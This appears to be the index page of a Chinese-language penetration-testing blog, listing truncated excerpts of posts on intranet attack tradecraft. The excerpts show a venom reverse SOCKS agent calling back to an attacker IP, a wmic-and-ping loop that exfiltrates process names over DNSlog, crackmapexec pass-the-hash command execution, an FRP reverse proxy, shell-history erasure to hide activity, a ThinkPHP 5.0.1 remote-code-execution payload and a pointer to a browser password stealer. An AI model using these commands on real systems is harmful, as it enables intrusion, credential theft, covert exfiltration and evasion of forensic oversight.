利用venom反向socks代理

2022年01月05日  No comment

目标边界: 12.12.12.12   agent.exe ‐rhost 198.118.119.118 ‐rport 9999 攻击机: 198.118.119.118  ./admin_linux_x86 ‐lport 99990x0­1 攻击机监听./admin_linux_x86 ‐lport 99990x­2 靶机反向连接agent.e
阅读全文 »

利用dnslog探测目标进程

2021年12月30日  No comment

常用于mssql高权限注入目标主机不岀网利用cmdshell for循环实现for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.xxxx.dnslog.cn >nul用powershell&nb
阅读全文 »

Linux主机信息收集

2021年12月22日  No comment

last   多数运维会接入内网登录系统这时候便可获取部分内网ip进而对内网IP段进行画像 Ifconfig -a/arp -a/netstat -anopt/ss -nt ifconfig -a 查看内网ip 网卡 网关    route -n   内网路由情况,也能为内网网络拓扑提供一定的信息 IPtabl
阅读全文 »

Crackmapexec

2021年12月21日  No comment

kali下进行安装apt-get install crackmapexecIP:可以是单个ip或者ip段-u:指定用户-H:指定NTLM Hash-d:指定域-x:执行系统命令crackmapexec smb 192.168.30.128 -u administrator -H f1de694efa543bb780da59c049541ea3 -d workgroup.cool -x&n
阅读全文 »

Windows域信息收集提权命令

2021年12月20日  No comment

获取Windows 其他信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar 查看WinRAR压缩文件等缓存文件打开方式:WIN+R -> %UserProfile%\Recent C:\Users\Administrator\Recent   //默认位置 dir %APPDATA%\Microsoft\Windows\Recent dir 
阅读全文 »

FRP or reGeorg OR tunna

2021年12月20日  No comment

利用Frp反向socks代理流量攻击机:      12.12.12.12       frps.exe ‐c frps.ini       开启监听 目标边界:     27.18.19.98   
阅读全文 »

内网抓取密码

2021年12月20日  No comment

内网抓取密码https://github.com/QAX-A-Team/BrowserGhost
阅读全文 »

Linux提权后总结

2021年08月10日  No comment

发行类型 版本在命令前加空格 命令不会被记录 [空格]set +o history   设置命令不被记录 set -o history       恢复记录命令 history -d [num]      删除指定命令行 num指左边序号标示 echo
阅读全文 »

thinkphp 5.0.1的坑

2021年04月18日  No comment

判断是否存在http://xxx.com/publics=phpinfo()&_method=__construct&filter=assert _method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo _method=__construct&method=get&filter[]=call_user_func&
阅读全文 »

获取阿里云机器的外网IP

2020年11月14日  No comment

        用于获取 ipconfig 不显示外网IP的机器nslookup myip.opendns.com. resolver1.opendns.com      wget http://members.3322.org/dyndns/getip  curl ip.sb curl ip.cn
阅读全文 »